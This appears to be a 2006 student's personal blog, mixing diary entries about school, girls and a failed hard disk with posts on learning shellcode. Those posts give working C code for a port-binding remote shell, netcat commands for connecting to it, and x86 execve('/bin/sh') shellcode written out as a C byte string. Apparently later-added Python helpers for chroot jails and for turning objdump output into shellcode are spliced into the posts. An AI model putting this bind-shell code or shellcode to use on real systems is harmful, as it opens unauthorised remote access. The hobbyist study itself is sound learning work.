in the name of zero

February 26, 2006

some new links

Filed under: life and school

i still can’t find any good free hosting.

here’s the deal, i posted my portbinding shellcode first for practice here..

and i figured, “what the heck”, i’ll create another page where i can put my journal on other matters too!

steph studies grub!

and another

steph and aleph

see ya.

February 25, 2006

genshc

i’m finding it extremely tiresome transforming the important parts of objdump -d output into valid c strings, so today, because i’m bored, i made something in c that parses objdump -d output and generates a complete c shellcode string from it which i can copy with ease into an editor. i call it genshc.

no error checking and stuff like that. basically assumes a lot. relies heavily on a (hopefully) _unique_ objdump -d output. it’s been working ok so far.

what other things are happening in niel’s land?

moving on to aleph one’s smashing the stack for fun and profit article. where i hope to put the fruits of my shellcoding labor to use for a change.

reading a book about the bios boot specification while doing separate studies on grub’s bootsector. and how boot sectors work in general. i’ve got the “boot then hang” concepts covered now.

in relation to that, i’m also studying interrupt 10h - video services and its related bios video functions.

i asked my mom if i could drink coffee and she said no.

getting addicted to dragon ball z (again) and great teacher onizuka.

more to come.

February 23, 2006

purge

over the past days, i’ve had some opportunity to think about where this blog (gnurbs dot blogsome dot com) is going. i’ve been posting too much stuff under hermetic studies it seems. as far as how rewarding that is to me, i reckon that this shouldn’t be the place to document my experiences on things other than life, thoughts, love, girls, and more importantly, steph any longer. i look at my blog now and all i see are weird constructs that don’t make any real sense whatsoever, even at third glance. those gray blocks are dirty and unfitting to my blog’s title and the only reason why i put them here is because i believe that hobbies are part of life too and i have nowhere else to put my documented experiences.

so i’m looking for free hosting now where i can move hermetic studies stuffs in. don’t know what i’ll call the new site yet but the theme would definitely be simple - bare - boring - ascii - monotone. hopefully, i can also offer my example files for download there. i think it’s also great if i can own steffylove.net.

i better get to work with google then.

February 22, 2006

portbinding shellcode

Filed under: hermetic studies

the second of a many part series.

first, some unrelated stuff i want to share. we talked about marriage and mate choosing in religion class today. i can’t stop looking at iris. she’s so sexy! and her black bag makes her even more sexy when she walks! we had a (sort of) activity about our preferences when choosing a mate and i can’t fucking believe i’m the only fucking one among the guys who chose number 9 - “i want a girl i can look up to very much”.

we were asked to choose 6 among ten choices and these were my answers… i want a girl who:
1) loves me.
2) who shows me a lot of affection.
3) who appreciates what i want to achieve.
4) who understands my moods.
5) who stimulates my ambition.
6) who i can look up to very much.

in other words, i want to marry someone _exactly_ like steph. no other girl comes close. i wonder what iris answered. oh well, i suck at girl-friend-ships so i’m moving on.

February 21, 2006

portbinding shellcode

Filed under: hermetic studies

well, not really but i’m getting close. this is part one of a many part series. initially, i was so damn clueless about it. and aside from the fact that in linux i have to use its own interface for socket system calls (socketcall, because there are no separate system calls for socket(), accept() and friends) instead of calling the socket functions directly, i think that making a portbinding shellcode was a bit more complex than any of my previous attempts at shellcode making. at least at first glance i thought it was. zillion of safemode.org, in his article, presented c code that was tested on freebsd and it really clarified the whole thing to me. i got his algorithm from looking at his source and together with some man pages, i decided to make one too on my box.

  #include <sys/types.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <netinet/ip.h>
  #include <stdio.h>
  #include <stdlib.h>     /* exit() */
  #include <string.h>     /* strerror() */
  #include <unistd.h>     /* dup2(), execve(), fork() */
  #include <errno.h>

  #define SHELLPORT 1435

  struct sockaddr_in shelladdr;

  void test_errno(int ret);

  int main(int argc, char **argv)
  {
          int err;
          int sockfd;     /* socket file descriptor */
          int shellfd;    /* shell file descriptor */

          /* argv for the shell: NULL terminated, and backed by real storage
             (an uninitialised char ** cannot be indexed) */
          char *shargv[] = { "/bin/bash", NULL };

  /*      if (fork() == 0){*/
                  shelladdr.sin_family = AF_INET;
                  shelladdr.sin_port = htons(SHELLPORT);
                  shelladdr.sin_addr.s_addr = INADDR_ANY;

                  sockfd = socket(PF_INET, SOCK_STREAM, 0);
                  test_errno(sockfd);     /* check the descriptor socket() returned */

                  err = bind(sockfd, (struct sockaddr *)&shelladdr, sizeof(struct sockaddr_in));
                  test_errno(err);

                  err = listen(sockfd, 1);
                  test_errno(err);

                  shellfd = accept(sockfd, NULL, NULL);
                  test_errno(shellfd);

                  /* the accepted connection becomes stdin, stdout and stderr */
                  dup2(shellfd, 0);
                  dup2(shellfd, 1);
                  dup2(shellfd, 2);

                  execve("/bin/bash", shargv, NULL);
                  test_errno(-1);         /* only reached if execve() failed */
  /*      }*/
          return 0;
  }

  void test_errno(int ret)
  {
          if (ret == -1) {
                  fprintf(stderr, "%s\n", strerror(errno));
                  exit(errno);
          }
  }

[ walkthrough ]
in a nutshell, i basically have to set up a tcp socket() that bind()s itself to a defined port (1025+), listen()s and accept()s a connection. when a connection has been made, duplicate the communication file descriptor created onto the standard input (stdin), standard output (stdout) and standard error (stderr) file descriptors, all defined in /usr/include/unistd.h, and then just call execve() normally.

you might have noticed the commented fork() statement above. well, at first i didn’t actually care to use it. but after testing the program i understood its purpose. as i understood it, the program would eventually be translated to assembly shellcode and injected into some other program whose buffer has been overflowed. the program must fork() a new process, otherwise the calling program (the host program where this will be injected) will stay there waiting because of accept(). in some cases, this is desirable, but for most, i suppose it isn’t. anyway, for my activity, i commented it out, because it makes studying easier.

for you visual people out there, here’s how it went.

on my first terminal, i compiled the source above and ran the program.

steph@heaven ~/git/null/asm/shellcoding/portbind $ gcc -o portbind_c portbind_c.c
steph@heaven ~/git/null/asm/shellcoding/portbind $ ./portbind_c
 -- notice that the program listen()s here now so no prompt -- 

my second terminal, i used just for verification.

steph@heaven ~ $ netstat -l | grep -i tcp
 tcp        0      0 *:1435                  *:*                     LISTEN 

hey! it’s there! then i initiated a connection using netcat.

steph@heaven ~ $ nc localhost 1435
 whoami
 steph
 pwd
 /home/steph/git/null/asm/shellcoding/portbind
 ls
 portbind_c
 portbind_c.c 

the commands i issued were whoami, pwd and ls; the other lines are the shell’s output. at first i thought that it didn’t work because i was expecting a prompt. i don’t know why the prompt isn’t shown. this sucks :( i’ve also tried manually setting up PS1 but the prompt is still missing.

steph@heaven ~ $ nc localhost 1435
 export PS1=shell@remote
 set | grep -i PS1
 PS1=shell@remote
 
other environment variables seemed to work, like setting $TERM so i can use “clear”. anyway, the prompt is not that important. i’m just happy i got a shell. now for the assembly version. i’ll need steph’s power on this one.

p.s.

in case you’re wondering why i chose port 1435, it stands for “i love you steph”. symbolic isn’t it?

until next post.

February 20, 2006

execve with arguments

Filed under: hermetic studies

so far, i’ve only been doing simple program loading using sys_execve in shellcodes. simple in the sense that no arguments are being passed to loaded programs. unfortunately, running a program without any argument produces rather boring outputs. today, i added a bit of twist to things. i tried to implement a shellcode that chroots into a particular directory.

first, an introduction.

chroot or “change root” for that matter makes it possible for a user to run a command or interactive shell within a special ‘user defined’ directory.

of course, a little bit of preparation is required before running chroot. one needs to imitate his/her root directory. here’s how mine went.

first, i made a directory that will act as my fake root.

steph@heaven ~ $ mkdir myroot ; cd myroot

once i’m in my fake root, i’ll be using /bin/bash, /bin/ls and /bin/pwd so i also need to create a bin directory inside my fake root where bash, ls and pwd will reside.

steph@heaven ~/myroot $ mkdir bin

then i copied the bash, ls and pwd binaries into it from my ‘real’ root.

steph@heaven ~/myroot $ cp /bin/bash bin/
steph@heaven ~/myroot $ cp /bin/ls bin/
steph@heaven ~/myroot $ cp /bin/pwd bin/

things are not done yet! i still had to resolve their shared library dependencies for them to work! i first resolved /bin/bash’s dependencies.

steph@heaven ~/myroot $ ldd /bin/bash
        linux-gate.so.1 =>  (0xffffe000)
        libdl.so.2 => /lib/libdl.so.2 (0xb7f19000)
        libc.so.6 => /lib/libc.so.6 (0xb7e01000)
        /lib/ld-linux.so.2 (0xb7f28000)

it uses some files inside /lib! so inside my fake root, i also created a lib directory and copied the shared objects there.

steph@heaven ~/myroot $ mkdir lib
steph@heaven ~/myroot $ cp /lib/libdl.so.2 lib/
steph@heaven ~/myroot $ cp /lib/libc.so.6 lib/
steph@heaven ~/myroot $ cp /lib/ld-linux.so.2 lib/

i did the same for ls and pwd. printing their shared dependencies using ldd, then copying them to their respective directories inside my fake root. after copying, i verified if everything was in place.

steph@heaven ~/myroot $ ls -l *
bin:
total 761
-rwxr-xr-x  1 steph users 680316 Feb 19 15:33 bash
-rwxr-xr-x  1 steph users  75268 Feb 19 15:33 ls
-rwxr-xr-x  1 steph users  15716 Feb 19 15:26 pwd
	
lib:
total 1301
-rwxr-xr-x  1 steph users   83620 Feb 19 15:36 ld-linux.so.2
-rwxr-xr-x  1 steph users 1228960 Feb 19 15:36 libc.so.6
-rwxr-xr-x  1 steph users   10892 Feb 19 15:36 libdl.so.2

groovy! my fake root looks like a real simple root now! time to test it.

steph@heaven ~ $ chroot /home/steph/myroot /bin/bash
chroot: cannot change root directory to /home/steph/myroot: Operation not permitted

oopsie! i guess i better run chroot as “root”.

heaven steph # chroot /home/steph/myroot /bin/bash
bash-3.00#

it worked! let’s try running some commands inside the fake root shall we?

heaven steph # chroot /home/steph/myroot /bin/bash
bash-3.00# ls
bin  lib
bash-3.00# pwd
/
bash-3.00# cat
bash: cat: command not found

i tried running three commands inside my fake root. first was ls, and it showed the contents of my chrooted directory. next was pwd, and it showed my present working directory, which happens to be “/” of my fake root. and lastly, cat. but it didn’t work. that is because i don’t have cat inside my fake root. i only copied three files and their corresponding dependencies. a good chroot directory must have all the important files or binaries for it to be productive. also, it must not contain useless files that won’t be used. in my case, it was the cat command.

lastly, i exited my chroot environment and copied the fake root folder (myroot) to where the real fun will happen. inside my git repository!

steph@heaven ~ $ cp -r myroot ~/git/null/asm/shellcoding/

it was too bad that i had to run chroot as “root”. quite creepy.
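The copy-and-ldd routine above, automated, as an added example that is not from the original post: parse_ldd handles the three line shapes in ldd’s output (the vDSO line has no file to copy; the loader line has no “=>”), and build_jail mirrors each binary and its libraries under the jail root. The function names and the reuse of the ~/myroot path are choices made here.

```python
import os
import re
import shutil
import subprocess
from typing import Dict, List

# ldd output for /bin/bash exactly as printed in the post above; used here as
# a constructed sample so parse_ldd() can be exercised without running ldd.
SAMPLE_LDD = """\
        linux-gate.so.1 =>  (0xffffe000)
        libdl.so.2 => /lib/libdl.so.2 (0xb7f19000)
        libc.so.6 => /lib/libc.so.6 (0xb7e01000)
        /lib/ld-linux.so.2 (0xb7f28000)
"""

# Three line shapes occur in ldd output:
#   name => /path (addr)   a shared object resolved to a file: copy it
#   name =>  (addr)        the kernel-provided vDSO (linux-gate.so.1): no file
#   /path (addr)           the dynamic loader itself: copy it
LDD_RE = re.compile(r"^\s*(?:\S+\s+=>\s+)?(/\S+)\s+\(0x[0-9a-f]+\)\s*$")

def parse_ldd(text: str) -> List[str]:
    """Return the library paths that must exist inside the jail."""
    paths = []
    for line in text.splitlines():
        if "not found" in line:
            raise RuntimeError(f"unresolved dependency: {line.strip()}")
        m = LDD_RE.match(line)
        if m:
            paths.append(m.group(1))
    return paths

def ldd_deps(binary: str) -> List[str]:
    """The manual 'ldd /bin/bash' step from the post, run for one binary."""
    out = subprocess.run(["ldd", binary], capture_output=True,
                         text=True, check=True).stdout
    return parse_ldd(out)

def jail_layout(binaries: List[str], deps: Dict[str, List[str]]) -> Dict[str, str]:
    """Map each file to copy to its destination path relative to the jail root.
    Paths are mirrored (/lib/libc.so.6 -> lib/libc.so.6) because the loader
    looks for libraries under the same directories inside the jail."""
    layout: Dict[str, str] = {}
    for binary in binaries:
        layout[binary] = binary.lstrip("/")
        for lib in deps[binary]:
            layout[lib] = lib.lstrip("/")
    return layout

def build_jail(root: str, binaries: List[str]) -> Dict[str, str]:
    """Create the jail under `root` with the given binaries and their libraries."""
    layout = jail_layout(binaries, {b: ldd_deps(b) for b in binaries})
    for src, rel in layout.items():
        dst = os.path.join(root, rel)
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(src, dst)  # follows symlinks and keeps the mode bits
    return layout

if __name__ == "__main__":
    # Same three programs the post copied by hand.
    jail = build_jail(os.path.expanduser("~/myroot"),
                      ["/bin/bash", "/bin/ls", "/bin/pwd"])
    for src, rel in jail.items():
        print(f"{src} -> {rel}")
```

chroot on its own is a convenience, not a hard boundary: a process running as root inside the jail can still break out of it, so whatever runs inside should be an unprivileged user.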

next page: the shellcode

February 18, 2006

my first shellcode

Filed under: hermetic studies

implementing sys_execve in asm was a pain. but i had to do that first on a normal assembly listing before doing anything else. i saw two implementations. one made use of the stack, which i happen to fancy. and the second one uses a predefined string.

i tried both styles but for this entry, i'll be showing the shellcode that utilizes the stack.

 global _start
 section .text
 _start:
         ; setreuid code block here

         jmp short .setup        ; jump over the code so the string ends up after the call

 .spawnshell:

         pop ebx                 ; ebx holds string address (pushed by the call below)
         lea esp, [esp-8]        ; room on stack for two dwords
         and esp, -8             ; keep esp 8-byte aligned

         mov [esp], ebx          ; first dword holds string addr (argv[0])
         xor eax, eax
         mov [esp+4], eax        ; second dword holds null (argv[1], also envp[0])

         mov al, 11              ; sys_execve; mov al (not mov eax) avoids null bytes
         lea ecx, [esp]          ; argv
         lea edx, [esp+4]        ; envp, an array containing only NULL
         int 0x80
 .setup:
         call .spawnshell        ; pushes the address of the bytes that follow: our string
         db '/bin/sh'            ; no terminator here; the C wrapper's string literal supplies the NUL

[ explain ]
you may have noticed this by now: why do we first need to jump to the last part of our shellcode, where the string is declared, and why is the string declared last in the first place?

it’s because we want the call instruction to have a negative offset back to .spawnshell. the offset is a signed dword: a small forward offset would be encoded with null bytes, while a small backward offset is sign-extended with 0xff bytes instead. the call also pushes the address of the byte right after it, which is the string, so pop ebx picks it up. we never actually execute the very last line of the shellcode (the string declaration). also, sys_execve overwrites the calling program’s text, data, bss and stack segments with those of the program being loaded.

Disassembly of section .text:

080480a0 <.text>:
 80480a0:       eb 1f                   jmp    0x80480c1
 80480a2:       5b                      pop    %ebx
 80480a3:       8d 64 24 f8             lea    0xfffffff8(%esp),%esp
 80480a7:       81 e4 f8 ff ff ff       and    $0xfffffff8,%esp
 80480ad:       89 1c 24                mov    %ebx,(%esp)
 80480b0:       31 c0                   xor    %eax,%eax
 80480b2:       89 44 24 04             mov    %eax,0x4(%esp)
 80480b6:       b0 0b                   mov    $0xb,%al
 80480b8:       8d 0c 24                lea    (%esp),%ecx
 80480bb:       8d 54 24 04             lea    0x4(%esp),%edx
 80480bf:       cd 80                   int    $0x80
 80480c1:       e8 dc ff ff ff          call   0x80480a2
 80480c6:       2f                      das
 80480c7:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80480ca:       2f                      das
 80480cb:       73 68                   jae    0x8048135

and based on those opcodes we construct the shellcode as a c string. we have a function pointer that we point at the string holding our shellcode and then call it. notice that each byte is written as two hex digits prefixed by "\x", c’s hexadecimal escape.

char stack[]="\xeb\x1f\x5b\x8d\x64\x24\xf8\x81\xe4\xf8\xff\xff\xff\x89" \
               "\x1c\x24\x31\xc0\x89\x44\x24\x04\xb0\x0b\x8d\x0c\x24\x8d" \
               "\x54\x24\x04\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
               /* the literal's terminating '\0' also terminates "/bin/sh" */

 typedef int (*fp)();

 /* jump into the byte array as if it were a function; this only runs if the
    array's memory is mapped executable, which modern toolchains do not do
    for data by default */
 void exec(fp f)
 {
         f();
 }

 int main(int argc, char **argv)
 {
         exec((fp)stack);
         return 0;
 }
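The genshc idea from the February 25 post (turn objdump -d output into a c string) and the null-byte point above, as an added example that is not from the original posts nor the author’s genshc: it parses the listing shown above, emits the c array, checks the result against the hand-typed string, and reports any 0x00 bytes. The function names are chosen here.

```python
import re
from typing import List

# objdump -d listing copied from the "my first shellcode" post above; it is
# the sample input for this example rather than output generated here.
OBJDUMP_LISTING = """\
Disassembly of section .text:

080480a0 <.text>:
 80480a0:       eb 1f                   jmp    0x80480c1
 80480a2:       5b                      pop    %ebx
 80480a3:       8d 64 24 f8             lea    0xfffffff8(%esp),%esp
 80480a7:       81 e4 f8 ff ff ff       and    $0xfffffff8,%esp
 80480ad:       89 1c 24                mov    %ebx,(%esp)
 80480b0:       31 c0                   xor    %eax,%eax
 80480b2:       89 44 24 04             mov    %eax,0x4(%esp)
 80480b6:       b0 0b                   mov    $0xb,%al
 80480b8:       8d 0c 24                lea    (%esp),%ecx
 80480bb:       8d 54 24 04             lea    0x4(%esp),%edx
 80480bf:       cd 80                   int    $0x80
 80480c1:       e8 dc ff ff ff          call   0x80480a2
 80480c6:       2f                      das
 80480c7:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80480ca:       2f                      das
 80480cb:       73 68                   jae    0x8048135
"""

# The hand-typed C string from the same post, for comparison.
HAND_TYPED = bytes.fromhex(
    "eb1f5b8d6424f881e4f8ffffff891c2431c089442404b00b"
    "8d0c248d542404cd80e8dcffffff2f62696e2f7368")

# An instruction line is "<addr>:" followed by the opcode bytes as
# space-separated hex pairs, then padding and the mnemonic. objdump wraps
# long instructions onto a continuation line that has bytes but no
# mnemonic, so everything after the bytes is optional.
LINE_RE = re.compile(
    r"^\s*[0-9a-f]+:\s+((?:[0-9a-f]{2} )*[0-9a-f]{2})(?:\s+.*)?$")

def parse_objdump(listing: str) -> bytes:
    """Collect the opcode bytes of every instruction line, in order."""
    code = bytearray()
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if m:
            code.extend(bytes.fromhex(m.group(1).replace(" ", "")))
    return bytes(code)

def to_c_string(code: bytes, name: str = "shellcode", width: int = 14) -> str:
    """Render the bytes as a C char array, `width` bytes per source line."""
    rows = []
    for i in range(0, len(code), width):
        hexes = "".join(f"\\x{b:02x}" for b in code[i:i + width])
        rows.append('    "' + hexes + '"')
    return f"char {name}[] =\n" + "\n".join(rows) + ";"

def null_offsets(code: bytes) -> List[int]:
    """Offsets of 0x00 bytes: a C string copy stops at the first of these."""
    return [i for i, b in enumerate(code) if b == 0]

if __name__ == "__main__":
    code = parse_objdump(OBJDUMP_LISTING)
    print(to_c_string(code, "stack"))
    print("matches hand-typed string:", code == HAND_TYPED)
    print("null bytes:", null_offsets(code))
    # "mov al, 11" is b0 0b; the 32-bit form "mov eax, 11" encodes as
    # b8 0b 00 00 00 (constructed here), which is why the post uses al.
    print("nulls in mov eax, 11:", null_offsets(b"\xb8\x0b\x00\x00\x00"))
```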

February 15, 2006

technology bites

ok, so you all know the story about my hard disk crash last week. well, here's the story behind that (at least most of the story anyway). this should have been posted last valentines, but i ran out of internet prepaid. great.

update: turns out, i still have prepaid left, my isp was just screwy last night. technology bites.

how often do you get blamed for something bad that happened that is seriously out of your control? and to add to that, how superfluous are the reasons they're spitting at you? that time when my hard disk crashed, i was only doing some usual stuffs while listening to some mp3s. after exhausting all doable means i could think of, i thought of the best possible way to tell the problem to my mom. this is a serious problem as far as i'm concerned since we really can't afford to buy a new drive immediately. my cousin came and i got into a sort of, heated argument with her husband about the whole scenario. apparently, he was blaming me for putting all kinds of stuff into the drive that it overworked itself to breakage. that could be true to some extent, but then can't it be possible that a hard disk is simply just another machine and in fact capable of just breaking down after a few years? i asked him that question and he said it isn't possible "basta basta". what the fuck is wrong with him? anyway, i've known him to be the kind of guy who thinks he is always right. as much as i hated his bullshit explanation about how to fix the drive talking about using boot disks and stuff like that, i still let him check my box out of politeness. he argued that i _must_ use a floppy at all costs (i used a livecd to at least show him that other than the drive, my box is still ok). practically pointless to use any kind of bootable disk here to fix the hard drive because the bios can't even detect anything besides the dvd drive.

now, i figured that since hell, i'm gonna buy a new drive eventually, so i might as well also get gentoo 2005.1 ready. it'll be a pain to update a gentoo 1.4 base on a dialup. i went to my other cousin's house to get free dsl. and the download took at least half a day. md5sums checked out ok, but there was always a problem with the burning. the files were corrupted. that meant i had to go visit him a couple of times to reburn. anyway, i only needed some basic stuffs like the install cd and at least wvdial and fluxbox and their corresponding dependencies so i didn't mind the corrupted files. the next day, my cousin called me only to tell that his wireless optical mouse doesn't work anymore. he asked me what i did last.. but hey! isn't that tantamount to passing the fault on me? i'm sure i left their pc running when i left their house so i couldn't possibly be the last person that used that. i went to their house without any money to go back home that day and replaced their mouse with a working one. luckily, they brought me home, otherwise, i'd be walking home at night a barangay's distance at the very least.

my parents were shocked when we received a notice of disconnection from the power company that was due the day after we received that bill! what the hell!? my dad told me they forgot to pay our january bills that's why. we had to make some emergency re-budgeting and my brother was furious because valentines was coming up. also, my headphone wire snapped, rendering the right speaker useless. my cellphone's cancel call key doesn't work anymore and then the cover lock broke. i had to glue it using mighty bond.

february 13, my brother's motorcycle's tire went flat. and since we were having financial difficulties because of the earlier issue with the electric company, my mom had to get money to buy a new interior tire from my allowance. she couldn't possibly get money from my brother, again, because valentines was coming up. he has plans, i don't. as simple as that. so now i have to suffer for being girlfriendless? isn't being girlfriendless torture enough already?

today (february 14), globe telecom's unlimited text service bailed out on me a couple of times since this afternoon. i was texting two girls xandra l and chris l when i suddenly ran out of load! apparently, my request reached their system at last and subtracted 15 pesos from my prepaid. (i registered for one day unlimited only) i rushed to the store to reload, naturally! since i can't possibly leave such pretty girls hanging at the other end. (like what some girls always do to me) we were talking about valentines and it was a very interesting topic imho. it all ended with me bidding chris l goodnight and happy valentines. xandra l stopped replying, it's either she got pissed off at my super late reply or she fell asleep waiting. either way, it's my loss thanks to globe.

at the kind of luck i'm having with technology recently, it's no wonder i flunked my cs class too. i don't wanna add my love life rants into this scenario anymore. that's an even tougher burden to handle. i'll cry if i talk about that.

i'm basically a dateless, penniless, loveless failure with every propensity to screw up at anything this love month of february.

lord have mercy.

February 14, 2006

valentine post. and vim

valentines. what can i say. same as last year my friends. it’s that time of the year again. the lucky ones get to go home late happy. some other lucky ones get laid. then, there’s the rest of us.

religious studies was boring as usual today. ended up just staring at iris and caroline. i skipped cs class after rs. didn’t really feel like spending another one and a half hours at school. i went instead over at zekkon’s (my favorite internet cafe) to play warcraft dota allstars. went home around 12:30, had cornedbeef for lunch. around 1, i started reading some portions of app-editors/vim’s help.txt. stopped around 5 because goku’s fight with freeza is soo cool at dragon ball z (he’s also close to becoming a super saiyan) and of course, great teacher onizuka wouldn’t miss it for the world.

globe’s unlimited text is screwy today of all days! darn it. and so far, only one girl texted to greet, ms bernicel e. i wonder how she’s doing right now at this time or writing. lynlyn on the other hand seemed content on playing gunbound with jef so i’ll leave her alone till her excitement subsides (highly unlikely). my mom and dad have no plans whatsoever for tonight. my brother is the only family member making the most out of today. good luck to him. i guess he’ll get married sooner than i ever could.

i don’t know what to write next so let me redirect you to an entry i wrote one valentines ago.

girls suck.


February 13, 2006

blog by vim

Filed under: hermetic studies

as a pre-valentines gig, i'm posting from within app-editors/vim using scott yang's kickass movable type python script client thingy. net-misc/blogtk and net-misc/drivel were first and second choices for a blog client respectively but then i knew i had to try scott yang's script the minute i saw it. since i'm on the subject of using the command line, i'll take this opportunity to say that i'm eyeing www-client/raggle for my news aggregator this round. the downside to this is that i need to merge dev-lang/ruby first.

i've merged all the everyday applications i'm using. now, i'm playing it safe, time to make a package-cd of /usr/portage/distfiles.

as for the mtsend.py configuration, commands and their relative vim keymappings (which i haven't made yet), i'll save them for some other time.
